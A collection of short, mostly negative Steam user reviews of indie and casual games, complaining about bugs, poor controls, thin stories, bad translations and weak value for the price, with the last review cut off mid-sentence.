Dont waster your money!!This game simply does not work with the htc vive controller. Something as simple as chooseing a card to exchange is frustratingly impossible. Also, there is no way to re-centre the view so your head hangs strangly well above your body. Overall it is a cheap looking game..
I had a really tough time deciding, if I should recommend this game or not. It's the first game on steam I actually can't recommend at all.Let me talk about the positives first: The game has quite a unique and very well done atmosphere. The music is great, as are the sound effects. The visuals support the eerie (albeit a tad cheezy) feeling the stages offer. It is really well done and some of the backgrounds and specials you can perfom look really amazing. But sadly, I have some big gripes with it, too. Mainly the controls and thus its difficulty. You are given no standard weapon and your main defense is running away and / or jumping over enemies. Which wouldn't be bad at all (maybe even adding to the atmosphere) but it's made near impossible due to the terrible jumping. I have read about the jumping before I bought the game and hope that it would have been fixed in recent updates, but sadly not. The jumps are just too tight and jumping over enemies without taking damage is impossible. Which wouldn't be so bad if you could keep some sort of weapon. But the only thing resembling a standard weapon is taken away, once you die, which often leads to you being forced to quit this run and start anew. It's just not fun at all.It's sad, because with some minor tweaks it could have been a really great arcade game experience. I love the music and the graphics and the developer's other game "Black Jewel". He really has some skills as a developer. Well, maybe the next game will be better, I'll definitely keep an eye out for it.
Stockpile is a great board game, maybe the best stock board game. But Digidiced has made it into a terrible PC version. Bad interface, the menus are too big, you can barely see the game board behind them. Difficult to understand how to play, if you never played the board game version. The latest expansion is not included. Barely playable online. I give the board game version 8/10, and this PC version 3/10.
This game is OK but the puzzles don't make much sense and it keeps freezing on me so I have to start again from the beginning. A bit frustrating once you've already got quite far.
Well, after the Godus debacle, at least this is a god game and not a money grabbing scheme. Let's put it this way: this game is where Godus whould have started. It's has interesting elements, at the cross between Populous and Settlers.The BIG probleme is the interface and balancing. the interface is really clumsy (no zoom... seriously???) and not great to work on. On balancing, it takes ages to destroy the core of an enemy... I mean you can wait for 30 min just waiting for your guys that have no opposition to just try to destroy the core and not do anything else...There is some potential but at this stage not enough.GRanted it is better than Godus. Granted, what is not?
For now, the game is still very buggy, approx. 1 year after the release. I don't recommend buying this game now, especially if you intend to play multiplayer. The multiplayer servers servers crash more than half of the time and there are also some problems with lag and other glitches. Singleplayer is entertaining, but it feels really unpolishes. Quests seem really few and repetitive and a lot of the game mechanics seem kind of unbalanced. Also, there are some bugs which might get kind of annoying.Overall, the game is really nice, but the bugs (both in single and multiplayer) make for a frustrating experience, and it does not seem like the devs will solve them anytime soon.
Neat, but not really worth the price given how small this is.
It looks cool and all, but there's better Minesweepers available.
Not fun for me
Would love to say it's a good game, but as the fact it's NEVER worked for me i have to say no
This game has some good points and some bad , for example the artwork is good but I did not like the weird puzzle piece shapes.The unforgivable fault with it is that it breaks a cardinal rule of computer games , i.e. you cannot turn the music off.If you hate the repetitive music as much as I do you have no choice but to turn the sound off completely. How hard is it to make sepeate sliders for music and sound effects?
G.R.I.N.D. This is a linear game that makes you do the same things over and over again. It basically boils down to make lots of money and buy the best weapons for fighters.The story is somewhat interesting. The fact that your fighters can leave at certain times during the game will keep you on your toes... but just a little.You will have no control during fights. There aren't many major decisions that you need to make. I find this game relaxing and I tend to do other things like read a book while playing. Because this game is such a grind, i have a hard time recommending this game. I'm only playing it just to see how the story ends.
Nice idea but very poor execution.There is not much of gear choice (always best), story #nobody, graphics average, animation poor, music? what music?, annoying RNG.Feels like author didn't like solitaire and didn't have skills to make a fun game.
It was 49-cents USD on sale so I'm not going to bother refunding it, but this is borderline unplayable.Of all the problems it could have, it's the how the camera tracks the player, which is almost 1:1 as you hop around in 30FPS.  I must've played for around 10 minutes just now I had to stop before I got a ♥♥♥♥♥♥♥ migraine from the eyestrain it was causing as the screen snapped up and down with each jump.  In an action-platformer.Angry Space Guy drops F-bombs constantly, which wouldn't be a problem if he had more than maybe three quips to say, and.. Mother of god, my eyes hurt right now...  Do not buy.  I repeat: DO NOT BUY THIS.
UPDATE: I was really frustrated when I wrote the initial review, so I think I came off much more harshly than intended. While the game is definitely not finished, it has potential. The basic building blocks of the game are all there; it just needs a story and some polishing. I've left the review as "not recommended" for now, since there are some serious issues with its current form, but I look forward to seeing the finished product.ORIGINAL: This game is obviously not finished. The controls are glitchy, the levels are poorly planned, there's no story, new items and monsters are introduced with no explanation, and the only form of attack you're given is some sort of freeze-trap which is basically useless. This game is artificially difficult and poorly made. However, if these were fixed, I'm sure the game would be good.
The only thing I can say about this game is its lack of choice options and the weak plot that is supposed to be enjoyble in this game. There are only really 3 or 4 choices you get to make and this game is literally played in two hours. Towards the end there is so much more that is added to the plot that can definitely be brought in earlier and expand the game. This game starts out too carefree with a sudden aggressive and "somber" ending. In any case it's better to receive this product for free rather than spend $5 dollars on a two hours game.PS the only real "sensual" in this game is a rape scene that in no way should be the most detailed of all the scenes. Consent should always be a factor in these cases, we don't want young boys to get "busy" with rape scenes and make them think it's okay for them to do it too.
So where I enjoyed the gameplay because it reminded Lara Croft GO Hitman GO and Deus Ex Go. The big difference is the not knowing what level I was on. I had to look up how many levels (there are 40 Levels) were in the game because there was no way to actually tell. In other games like this there is usually a level select screen that tells you what you've either beaten and/or how many levels there are. The ending wasn't to challenging and the pacing is pretty good. But for $3.99 (US) I can't recommend it. If it is on sale I would say pick it up if you like this genre of game. It is fairly short I have a total of 1hr46min but about 30 was from me being afk and taking care of RL things.
Needs to be optimized.
The Game isn't to bad, Just is riddled with issues. Skills is not the same, Each button push feels random, [2] for the spin kick, well First push you might do a 360 tornado spin kick, second button push might just be a 180 degree spin kick, The UI doesn't update, Half the time the skill icons would be full, but on a cool-down? [A] and [D] Needs to be reworked, When I push Left or right, I expect a side-step, Like every other third person fighting / shooting game out there, Not a full flip to the side, It makes the game harder than it should be when you try to sneak around an enemy and Well ♥♥♥♥ me silly! I side flipped off a godamned ledge. You can't break the enemy attacks but they can break your attacks. Half the time when I tried to use the moves, I didn't even start the animation because Oh welp, Enemy hit me and broke the attack. Oh and No Cool-down on the enemies special moves, so expect the goblin to ♥♥♥♥ you like a little ♥♥♥♥♥, cause He will spam that fire attack which will put you in the loop of being knocked back on fire, to stand up and welp knocked back again.
Treasures of motezuma 3 was good, Montezuma 4 was great.... Montezuma 5...so disappointing. I'm glad I bought it when it was on sale.  You can play through the entire set of stages in around 5-6 hours and you're done.  There are some side game stages that are a challenge, but really if you haven't played the motezuma series, just go for Montezuma 4, it's the best one.
Lol, I've played the Football Manager series and they have a great format. The developers take pretty much a lot of their ideas from that and put it here ... except they haven't catered it properly here. They even use 80% of the same skills like 'Flair, Vision, Bravery'... LOL Basically this is like me watching Masterchef or some cooking TV show and me trying to replicate all the methods ... to build a sandcastle.
I'm about 6 missions in. There's nothing casual about the gameplay. Each mission is timed (1 to 2 minutes), giving you little time to look around. Tasks just involves clicking in a series of areas to produce a certain final product. Bonus items also requires that you look around the scene and find it. Obstacles (like moles) try to impede your progress. The only way to get rid of them is, you guessed it, click on it.I was looking for a sandbox mode but can't find the option. I originally hoped this game would be some sort of cartoony sim farm, but all missions are timed leaving you little time to actually enjoy the game.Wouldn't recommend this game.
It's difficult to criticize cheap games, but I found myself not pleased with my overall experience of the game. The length of the main part of the game is to be expected, so no problems there. However, there is so little replay value even with the quick game option. No multiplayer is a glaring example. My experience with the game in both story and quick play has been to repeat the same moves repeatedly until the ai eventually makes a mistake. If the aim of the game is to win, then I find this to be the best tactic. Of course, the potential exists to not play like this, but also increases the chances of losing on the hardest difficulty. On the topic of replayability, there is also no reason to play the game again. No achievements, no collectibles, no unlockables. The only incentive currently is steam trading cards (the reason my playtime is higher than 1h). Perhaps this will change if the developer wishes to add content to the game in the future. It's quite easy to see features being implemented such as new visual elements, new music, new gameplay modes, multiplayer, character skins, challenges and so on. Maybe one day there will be new features or options. The aesthetics of the game are certainly interesting, including the opera style theme music. Initially, the game is quite unique, but after ten minutes the specialness of playing something different was already gone, as I found myself repeating the same combination of movements. Is a unique aesthetic enough to justify purchasing a game that will potentially last between 20-60 minutes? Despite the price, I would say it is not. The game certainly isn't bad by any means, I just don't believe that what it currently offers justifies the (admittedly low) cost of the game.P.S, I also dislike not being able to turn off music or sounds. After having the game on for 3 hours for steam trading cards (I have something of an ocd about booster pack eligibility), I now hate opera forever.
So I've played through the first two chapters (which as far as I can tell is all there is at this point), and I have to say I was highly disappointed.  The dialogue is very juvenile, it really seems like a early teenage guy trying to sound super tough.  As far as actual game play goes I would start by suggesting more payoff of exploration, by which I mean beyond the office there really isn't much you can click on or investigate.  I'm not a huge fan of the blocky graphics but that is mostly just a personal preferance. The final thing I have to say about this slightly dull game with potential is that at no point in any game have I ever thought to myself "Gee if only I could actually watch my character piss, that would make this experience so much better".  While I won't be reccomending this game anytime soon, I will certainly play the next two episodes when they come out in hopes that there is improvement :)
maybe the first level and the DLC show some signs of actual puzzle design. but jeez this is just sooo unpolished it shouldn't be released like this. I appreciate the designer likely put a lot of effort into it and it's fairly cheap, but it's just not really good at all.
The are a LOT of hidden object and puzzle games and a great deal of them are really good. Some of the good ones are free, heck there are even decent HOGs on facebook. You have a variety of them to choose from, you shouldn't waste your time on Crystals of Time, it's not even free.No, you are obsessed withs HOGs? You just HAVE to get this one? You sure?Ok, so if you really want to spend your hard earned money (or your parents' hard earned money) on this particular game try to at least get it really cheap. Like in a bundle, during sales, with a coupon or something, just don't buy it full-price because in all honesty it's not worth it.There are a few reviews that eloquently explain why this is one HOG that's probably not worth your time, so I'll just list the things that annoyed me most.-No storyline that makes sense.-No voiceacting or animations.-A lot of back-and-forth fetch quests for no reason.-Really easy puzzles even on the "hardest" difficulty.-Some pixel hunting.-Poorly designed map that doesn't really save you any clicks.-Lack of common sense.-Most abrupt ending in the history of abrupt endings.The art was not bad, and the music wasn't irritating. After the first couple of hours you kinda get the weird logic of the game so it becomes less annoying and you can enjoy it a bit. I can't find anything else that I liked about this one.To make your life easier I have only one advice. Notice the spots where the HOS appear. At random times, when you need an item, you will have to go back there and play a new HOG in the same location. No, most of these do not have a logical connection so you'll have to go through most of them again and again seraching for the elusive HOG. So when you're stuck you either hit the hint button, or go throught every room and location and try to find out where the new HOG is.Good luck..?
I got bored so fast and don't feel any desire to play again. Maybe if you like a particular kind of puzzle game, you will like this... me, I knew how each puzzle needed to be solved, but the precision required for some means even a tiny lag in a key click causes death. I do not find that fun.
stulbi bugi UN IEKARAS PIE 13.LIMENA un talak nekur nevar tikt NICE!!!!! :)  PIGGY POGGY POG BIJA DAUDZ LABAKA SPELE! :)))))
User interface bugThe dev is not responding in the HUBI would edit if an update fixes the problem.
Only buy this if you love being frustrated on a constant basis.
my camputer dond run work game because i think my camputer broken because brother zombie not play bad bad gaem!!!
Puzzle Agent 2 to start off has a lot more bugs than the first. Also, the game opens strong until you reach the midpoint. That's when the game decides to quadruple in speed effectively destroying any story it had in the process.
Takes to long for a day to pass and unable to get any of the food for the animals to feed them so no animals can be fed and no missions can be completed
The game play is just not very engaging
I mean for a cheap puzzle game it's decent.For the story line at the end or just in general throughout the game...it's pretty awful.Most of the things around the halfway point is just guessing what to do.And if you have never played piano...well you gonna learn DAECDE to play lol.It doesn't save until you actually get to club in the basement.The music is so loud, you nearly go deaf, and considering there is no settings to altar sound is a really bad thing the game lacks.For a game that released in October of 2017, the graphics are REALLY bad, and lacks a lot to be a decent game.I would rather rebuy and replay Kingdom Hearts 1 (also doesn't have sound settings) and play that over this game. There's better story, and you can save.I don't understand why everyone would rate this so highly when it's so crap.
This is a weirdly bad game, even by low-budget indie standards. The environment is unfinished, the character models are unfinished, the animation is unfinished, the sound effects are stock sounds, what little story is there makes no sense, the voice acting sounds like it was done over cheap PC headsets...Literally nothing about this game is actually finished.  This the weirdest thing I've seen in a long time.
An all around poor showing.  This game is shovelware.  This game embraces laziness with an unbreakable vice-like grip.PROS:- Graphics are simple.- Game doesn't crash.- The music is alright.CONS:- Imagine a compass.  Physics dictates that a cueball (moving north) can only cause the target ball (the 7-ball, for instance) to move north, east, west, or some combination thereof.  The target ball CANNOT move south -- passing backward through the cue ball toward the player.  This game makes an exception.- The balls grind to a halt on impact; the very concept of friction ceases to exist within the bounds of this game.- Moving the cue stick is absolutely agonizing to the point of enducing rage.  If you play this game for more than 10 minutes, there will be murders in your home.- Messages from the game appear in a whispy battleship blue font color against green felt -- making them neigh unreadable.- There is an option under "Options" that has no label; your choices are "none", "human", or "AI".  WTF could it be?- The reset button has no label.  Thanks game -- guess we'll never know how that match ended.- When the balls are "racked" (no animation, they just appear), they're not tightly together.- The breaks are risible to the point of tears.- You cannot turn off the ball guides (the lines on the table that show you where the ball will go after you strike it).- When the cue ball finally danes to stop rolling, the stick points due south by default (toward bottom of screen) regardless of cue ball location -- which is absolutely maddening if the cue ball is resting against the south cushion.
I love the art.However, the whole story takes place over 5 days. Their is little to no actual storyline aside from you all work in a cafe (some badly). The characters and romance have no progression or direction. Its just over too quickly to be good. I really wanted to like it but  was left disappointed. there are just better ones out there.
the game is broken. it refuses to let me click on certain items in the hop.
Might be worth it for the cheap price, but overall not a game worth owning.1. It's random.It's focused around a completely random mechanic where any two items or foods can be combined to create a completely random item that has nothing to do with what you put in to cook it. Whenever you cook something, you're rolling the dice. I thought it might be based on tier, but I combined a rainbow sword with a rainbow carrot and got a mushroom. That was when I realized it was 100% random2. It's buggy.Barely walking into a room can spawn an enemy on top of you forcing you to instantly take damage. After you kill an enemy, they can still shoot you until they are completely gone even though they have stopped moving. For melee enemies, they can still damage you if you touch them. You will sometimes be completely invulnerable to all damage, only to lose that for no reason five minutes later. You can keep shooting after you die. Some enemies can hit you through walls. It goes on. What I'm saying is, this isn't a finished product that should be on the steam store.3. It's empty.There are basically seven types of rooms. Poison, Lightning, Wind, Fire, Chest, Wizard, and Dark. all of which can either have or not have enemies. Wizards will sell you... stuff? and are the only place to spend your money. Chest rooms give you a free item. Dark rooms you can't cook or eat in. The other four are just elemental hazards. Once you've discovered each of the six types of room, there's nothing left to explore. Everything after that is cooking and hoping you get cool items to fight the ever increasing in difficulty enemies.Summary:Overall, it is an unfinished, unpolished, unfair, unoriginal mess. On the other hand, it's "cooking any items" concept if done right could be very unique and fun. It feels like playing a ♥♥♥♥♥♥ GameJam game, which might be okay if it had any semblance of fairness when cooking items.
oh boy, tap here to... sure, but im not even in the screen so i can do that. man this is one broken game.
I get a little excited by the comparisons with Bind of Isac *really loved that one!But....  unlikely... there is no story telling at all, The game starts without even a decent Main Menu...Its really confusing...Nothing is explained...the itens you pick doesn't seen to have any use...Even the health points doesn't make much sense...  Just confusing...
Is it wrong that I want to call this game 'Candle Extinguisher Simulator'?I really want to like Fatale. After being so impressed with The Path and considering how fascinating the concept of Fatale is (I like the idea of exploring someone like Salome through an interactive medium) this seemed like it would at least be an interesting experience. And there are things to enjoy! The art-style is nice, the soundtrack is great to listen to and that dance epilogue... oh wow! That is quite possibly the most beautiful piece of 3d animation I have ever seen.But I cannot take this game seriously, at all. I took my time, I explored each section and I even did three playthroughs in case I missed something, yet still this game doesn't do anything for me. The control is strange because it's open yet still limited (I really wanted to go down those stairs into the ocean), there isn't that much to really examine and the whispers/bits of poetry are pretty... but they don't seem to mean anything. I know this is an interactive art experience that won't appeal to everyone, yet it feels like what the description promised didn't come to fruition in the gameplay. Instead of falling in love with Salome, I was saying 'WHAT?!' over and over while staring at the screen incredulously. Anyone who did enjoy the game please tell me what your experience was like, because if there's something that's completely going over my head I'm more than happy to give it another chance. But as it stands... I cannot recommend this game.
I bought this because I'd enjoyed Cradle of Rome, but this didn't feel half as strategic.On the good side, this is extremely reasonably priced in the sale (currently 69p), the graphics and design are quite beautiful, and real thought's gone into creating a non-distracting storyline.However. it may have been because I chose to do games against the clock - but I found that the only way to get through many of the levels was to click as fast as possible all over the board to amass enough 'wealth' to finish in time. Which seemed pointless.Also, each level includes a hidden object round - which is fine. The problem, for me, came with the occasional challenges that you have to pass to get back on to the match games: one protecting daisies from being blasted, and the one that entirely blocked me from going further: one clicking on an expanding flurry of snowflakes. Both of these were all about extremely fast reflexes, and clicking furiously for a couple of minutes. I'm not adverse to fast-action games, but I'd not expected them to crop up in a match game, nor to be as challenging as they are, quite randomly in a completely different genre. I bought the game for relaxation, and quick-thinking strategy, but it ended up being a frantic click-fest.
I was willing to give this a shot even though it was under the Nancy Drew dossier model. I didn't really know what to expect, but I was not pleased. My first thought was it looked like a downgrade from the orignal Nancy Drew titles. I was still willing to give it a shot since maybe I'd enjoy a thing or two. The game quickly turned into a hidden object type game during every screen (and not the good kind). My biggest dislike was the minigames-they were not too hard, but they quickly became tiresome. They were much too simple and did not have lasting appeal. I did enjoy the bonus rounds though-you essentially play a match game with points-yes, this game also has a point system. Depending on your end score you''l be classified at a certain detective level with a promise that if you get to the highest level you'll receive a special ending. In short, if you like the classic Nancy Drew games there's a big chance you will not like the overall look or gameplay of this game.
This seems to be like black and white but less good in every single way. I have had trouble even getting builders to work, the game seems half done even though it is finished and the text on quests is in broken English.  Don't make the mistake I made and buy this. If you want to play a good game like this go back and play black and white 1
Well, I bought this game because I love Point &amp; Click games.But this game is... Well, let's proceed in order.- Graphisms/Animation : it's not that bad for a 2005 game with a low budget. Excuse me, you say? 2010????!!!! Holy sh-- Story : it sounded pretty boring at the beginning but if you can persevere until the first heist, it's not that bad.- Gameplay : well, there are some puzzle in this game and some are hellish as hell when they're not "buggy" or without common sense. One point that really get on my nerves is that sometimes, the game expect you to do something to progress but this thing doesn't follow the course of the events or you can't just guess it seeing the situation- Music : the music is catchy as ♥♥♥♥. Seriously, I want to get this OST. Sadly, the mix is ruined by TOO LOUD footsteps or music above the characters voices.- BUGS : I never saw a game crashing this many time in a row. Save often. And if ever the game crashes again and again at the "cells entry", skip the scene and it will be fine.So, I finished this game in 2 sessions of 4 hours. It can be appreciated if you can look over the bugs and poor technical qualities.Make your choice ;)
There was an expectation for the game to be like Euro/ American Truck sim. Nice to see them updating this game, but I am seriously under-whelmed. Plays too much like Construction simulator 2015.
This game has a lot of issues, but a lot of promise. It's a no for now (and hopefully it'll get better), and here's why:First the good: I really love the stats and artistic representation of a lot of prospects here. They show a great level of quality and ultimately set the entire feel for the game. This is certainly has and shows more promise for a greater potential to the game.Now the bad...:Honestly, the 3d modeling is rough at best, and atrocious at worst. This is because I can't tell what is artistic design, and what is just unfinished or glitches.Secondly, the ungoldly number of tutorials don't trust you to learn anything for yourself - you are spoonfed everything, utterly destroying the immersiona and general flow of the game. Would definitely appreciate a simple Tutorial tab.Lastly, and the most glaring offense in any RPG, the Story. The game throws you into a situation with no context (not bad), but then proceeds to just have Miria literaly VOMIT Exposition upon you - some of which is helpful yet incomplete, most which expects you to practically take notes.I would love to revisit this game, but only after it has had a significant number of tweaks and changes - I wouldn't even mind if they dropped the 3d altogether and went 2d.
I have spent more time thinking how to depict this platform game rather than enjoying it. I feel like Sleeping Valley developers have a lot of nerve launching this game to Steam at this price. If this game was free play I wouldn't feel so compelled to write a negative review warning new players not to buy this game.Controls are awful, you can only move and jump and both perform pretty bad. When you jump and move while in the air you just move at constant speed at that direction instead of slowly losing force which makes it very hard to aim for small platforms. Stages are generally bad and combined with the horrible mechanics the gameplay is rubbishy. It is also full of bugs, sometimes you lose checkpoints and have to start at the beginning of the stage again and my second run lasted 5 minutes because it bugged and sent me to the final screen directly. Above all, the Red Sea stage is also bugged, in the game trailer you can see how groups of rocks fall from the sky while I ensure you that in-game the Read Sea is a nightmare where rocks are launched everywhere extremelly fast giving you no chance and being just a matter of luck that you pass the stage.I encourage you to read reviews of other users about this game and you'll find long negative detailed ones that complain about the same things I do. There is only one little thing that I know for sure I will remember about this game positivily: during the bugged Red Sea stage, one of my friends watched my broadcast of the game. He watched 20 minutes of helplessness and impotence as I died once and again. He watched how my hopes of overcoming the game slightly disappeared in the unfair bugged Red Sea, where only luck mattered... But, after 30 minutes of swearing, rage, despair and pray, the Goddess of Fortune took pity on me and let me pass the cursed area... I died a few obstacles forward and the game respawned me at the beginning of the Red Sea. My friend died too, but from laughter. Rest in peace, Varoe.
I tend to give a lot of games a chance, but this is one of the few games I would pass. There isn't a solid storyline. It is mostly a weak storyline with a lot of sexual abuse, torture and rape thrown in. The good endings are pretty mediocre and the bad endings make even less sense than the good endings. The only positive thing about the game is the voice acting. There isn't much to be said about this game that leaves a good taste in my mouth.
This game is fun. Very fun...but there's not much to it.  The game ends after a couple of hours and it tells you to move to a new city that hasn't even been implemented yet.  This would be fine for a new game, but this game has been out almost 2 years.  There are posts on the message boards from the developers saying they are working on content back in July of 2015.  Still nothing new has came.  IF you can get this on a sale for a couple of dollars, then great, get it...but don't pay full price.  This game isn't completed and doesn't look like it ever will be.
So glad I bought this on sale, I can scarcely imagine the rage I would feel if I paid $60 for this crapshoot. If you do actually want to play anyway, go for a full tank build. It's the only one that isn't made useless by bugs and poor design choices.
its a small zombie,crafting game!! just think of minecraft but with zombies.
misses the actual fun part of mario party it tries to emulate. doesnt really account for different skill levels, and only tends to reward players that are already doing well, rather than players who might be lagging behind. also the art is... not good. the rag dolls are way too confusing, even when customized
If you want a cute spin-off in the seduce me universe it's worth the play for the cheap price definitely. Mini games to get through a story that you can't skip just aren't my personal cup of tea. If you don't mind going through those though it is a good and cute game
Alright, this thing is short and quick, so my review is going to follow suit. LIGHTNING ROUND, START!!Pros: + Adorable-as-ever cast+ A few good chuckles+ Nice soothing music+ Neko-Nin 3 is coming, as this was made to remind youCons:- Awful, downright shoddy punctuation, capitalization, and spacing. You KNOW something's wrong if it's too easy to misinterpret the meaning of the first sentence so horribly that it messes up the context of the entire conversation.- Typos are quite frequent. (Or at least I 'think' they are; I'm gonna give it the benefit of the doubt here and chalk it up to the punctuation issue, as the punctuation and spacing are so bad it's hard to tell if it is or isn't a typo, honestly.)- Feeble story premise that shows a desperate attempt for a cash grab. They could've cleaned up the script a bit and included this thing in Neko-Nin 3 as filler content, and I'm sure nobody would complain. Instead, they rush this out in order to get some money rolling in. And yes, I get it, ya gotta pay the bills an' all that. BUT not at the price of quality, I say. They CLEARLY didn't put as much effort into it as they could have, and it shows. 'I' could do a better editing job in about 20 minutes. An hour, TOPS. (Hell, mayhaps Whirlpool should hire me as a postproduction editor, maybe~?)FINAL VERDICT: 4 of 10. Below average. If this was a free little side thing, this would've been a positive review. But c'mon now; this is basically nothing more than a paid expansion pack to rival EA's worst. Sure, cute story an' all. Sure, Tama's adorableness was enough to rate a whole point on her own. But....come on Whirlpool; I 'know' you can do better than this. But this is proof that Love in Space is better than Whirlpool; at least LoS puts in far, FAR more effort into a FREE product that they don't make ANY profit off of, whereas Whirlpool just dropped the ball on this one.If you're a big Neko-Nin fan, you should absolutely get this. But if not, well....wait until it's at LEAST 75% off; full price is just NOT worth it. Hell, I got this on a 50% off sale, and even 'I' am getting buyer's remorse from this underdone thing...
The actual game just doesn't feel like what's advertised even though it is what's advertised. Just wasn't that fun.
I would be fine with the game having a smaller community and needing 5-10 minutes to get a match, but after waiting almost an hour in the queue I have still not gotten a single match. The game looks interesting, but I am requesting a refund. Maybe I'll look into the game later and see if it has players, but for now the community appears to be nonexistent.
bad game didn't allowed me to beat my cats
Completionists beware!TL;DR- For a casual single playthrough, it might be worth buying if on sale or part of a bundle with better games included. But for anyone who might want to hunt achievements or anyone looking for an actual challenge, skip this one. 2-3 hours playtime first run.Achievements are bugged. I played through a second time and never got the credit for three different achievements that I should've been given for that second playthrough. I was in the middle of trying a third run after deleting both my previous files to see if that works when I ragequit because I realized a milisecond too late that I'd missed a pawprint and would have to restart yet again. If you're the type who wants to have 100% of the steam achievements, you'll need to beat the hardest mode without skipping the puzzles or using hints AND get all of the pawprints in your FIRST run. Because there is NO going back to completed areas to get those last few paws. And there is NO replaying a puzzle to see what you skipped. And there are NO second chances. YOU LOSE. GOOD DAY, SIR!Beyond that, several "mini-game" puzzle segments are just plain tedious and not actually challenging. The "put pieces back together" types are irritating because every single one has the pieces and the place you're putting them at slightly different perspectives. This makes shapes and color patterns both really difficult to use for no good reason.A lot of the UI is unresponsive. Picked up the wrong piece and want to set it down? No, you CAN'T just click the spot you picked it up from. Have fun clicking madly for a few seconds before the game finally realizes that you want to let it go. Trying to spin a plate? Logic says spinning the mouse faster should make the plate accelerate faster, right? WRONG, THE PLATES SPIN ONLY WHEN THEY WANT TO SPIN.It seems the majority of people struggle with two of the "mini-games" and yet the devs' response was basically "Well you must be doing it wrong." and nothing else. No tips, no troubleshooting, no links to actual game footage of the solution. And don't try looking up a playthrough on YouTube, because the solution that guy uses for the barbell puzzle is literally impossible in the game currently. And he's the only one with a full playthrough. You're better off just mucking around until you get it to work. Best advice for barbells: Try to get the plates of the same color together. Best advice for plates: Try setting your framerate down and/or using a windowed mode instead of fullscreen. And the best way I've found to beat the HO levels is to click madly around areas with a lot of items until the list is half gone. There's no penalty for misclicks, so you might as well abuse that, right? None of the objects are really that cleverly hidden, although a few are just plain unfair owing to things like the definition of what shape constitutes a "leaf" and the abysmal lighting level in basically 80% of the scenes or more (there's even one level where the light flickers slightly, and yes it is MADDENING when you're trying to see in the dark corners).Completionists, be prepared for frustration and anger. Casuals, you might like a single playthrough, but I foresee at least a couple skipped puzzles and a few HO hints used. Spend money here at your own risk.
EDIT 12/16/2019: THEY LISTENED!!! The devs took notice of what we were saying in regards to some item sprites. While some sprites you can still tell were inspired from games like Pokemon, they've been redrawn. Unfortunately, it doesn't change my overall stance on the game. It pleases me to know that a dev listened to its biggest complaint. I hope that the dev continues to make improvements and change any other sprites that may have been taken from other properties. I still don't recommend this game, but if perhaps we do get a settings menu, tutorial, and something that tells us what each item does, I will consider changing my stance.Game is meh, I wouldn't recommend it to friends.MUSIC IS SUPER LOUD WHEN YOU OPEN THE GAME. I have to turn my speakers down so I can hear myself speak. The game doesn't teach you how to play, is full of bugs, there's no settings menu, and there are a TON of stolen graphics from POKEMON! YES! POKEMON! This was made for a quick buck clearly. If I were the devs, I'd be ashamed. I like dungeon-crawlers and this has a unique mechanic but I have no idea what certain items do (need something to tell me what they do because I have no idea). HEALING IS IMPOSSIBLE.DO NOT BUY THIS. THIS IS NOT A GOOD STEAM BARGAIN BIN BUY!
Am I the only one that can't even launch the damn game? I've tried launching the game over 20 times now since I bought it this past Thursday, (the 18th). I've emailed Petite games and all of there "solutions" were s h i t. Like try running the game from Steam, try running the game from the Steam folder in your computer, try uninstalling it and reinstalling it, etc. They haven't done anything really. I think I'm just going to ask for a refund. Just thought I'd let people know.
I tried to enjoy this game but generally i just cant,the game is totally not worth the price and the gameplay itself is just horrible, i was so hype when i saw a game where i can be a spider but the hype was totally just a hype
As of me writing my review, I bought this VN during it's current sale. Now, after getting into the story for at least a few hours, I would say that I don't think this is really a worthwhile selection, although it's not really what I would call "atrocious."The positives I took out of the game were; the artwork, the music, and the four girls' VA/personalities. Still, this is a VN where story is supposed to be important, however with bad dialogue or dialogue that sound like nothing a normal person would say, and the several spelling errors I came across peppered along the way, I would say Wild Romance has some sizable problems in this department.This VN isn't an awful one, and it maybe worth your while if you like cute girls, especially since it's on sale right now, but other than that I wouldn't recommend this game.
I would write a long review but i don't want to waste my time. I've already wasted both my time and money.Edit: I'm sorry i can't say i liked it. The game is mostly boring and static. I found this game lack of some RPG elements and the ones it has are presented very poorly. For example, i don't understand why there is a levle selecting menu in an RPG. and levels are just some dungeons for fight and nothing else. There is only one person who appears every level and sell/buy some stuff. But there is nothing or no one to interract. And there isn't even a proper map. The minimap is useless. You need to look to the strategy guide for navigation and pressing alt+tab always is terrible. The need of non-free stategy guide is an epic fail for alone itself. Combat is boring. There isn't so much to do. But the worse part is, you need the finish in a specific turn without losing so much HP. So you can claim full reward. But this make it more boring. For the rewards, you have to just attack with your characters full power and finish the fights as quick as you can. And this is the one of the two way for making your characters stronger. The other way is leveling up but it doesn't give you so much. Only speed of your characters increasing and you can be able to use more abilities but you can't say chose anything or decide anything. For my opinion this is terrible character progression for an RPG. Another thing about make RPGs awesome is story. I wanted the see the end of the game even if it bores me but i couldn't resist and didn't play at some point. Trying to make poor twists and some jokes doesn't make story good. So I didn't almost anything about this game.
can't even play this game , so i want my $ back....................
Rather slow puzzler with a decent concept (find a path connecting nodes) which doesn't ever challenge. Out of 48 puzzles there were only up to 5 which I needed more than one go at, and those didn't include the final few puzzles. it's also rather sluggish to control with an awkward delay whenever you pick up or deliver a colour which isn't what you want with this kind of game. All in all, I came away with the impression that this was someone's first game and that they were rather proud of it, and if that's true then they should be somewhat proud of it as it is very functional, I'm just not sure it's worth money (even with the suitably low price point).
bad .
This might, at least, have been a dramatic choose-your-own-adventure type romp if it were not for the horrendous English translations.  Or what I can only hope are translations, as no native English speaker should use syntax so badly.  On the upside, the graphics and music are decent, on the downside...everything else...
Ghost Control Inc seemingly has everything going for it. It's a game where you essentially play team manager for Ghosbusters! And it has a nearly-perfect blend of tactics and management gameplay! What could possibly be more fun?Unfortunately, the game is marred by several issues.Firstly, the art direction is uneven at best. Most of the ghosts have very uninspired designs that won't stick in your mind like those of other franchises involving catching ghosts. Several of the ghosts are just recolors or slight redesigns of the lower level ghosts you fight early in the game, so they're both boring to look at and repetitive. This also makes it slightly harder to tell what you're figthing at times.Secondly, the writing is just atrocious. This isn't a story-driven game by any means, but there's still quite a bit of text, both in item/ghost descriptions and in the dialogue where you're offered missions. It often tries to be humorous but falls incredibly flat, to the point where you'll probably stop reading it after a while. There are also many spelling and grammatical errors throughout the game. The dev team's native language is obviously not english, which explains this problem but doesn't excuse it, as they should really have hired someone who could do a better job localizing the text.The poor writing also affects the central story, such as it is. Certainly, the real story of the game is just managing your team, but there is an attempt at a mounting threat, but it's very bare bones and unengaging, and marred by more failed attempts at humor. Again, a certain other ghost-catching series knew how to build up a supernatural threat...Lastly, the game is just incredibly janky and buggy. Crashes are relatively common, items will sometimes not equip properly, the interface will ignore your input, performance will start chugging wildly after playing for more than an hour, certain items and features won't unlock when they're supposed to, and most importantly, saved games will load incorrectly, switching character positions and stats around willy-nilly. It's a very frustrating experience to try 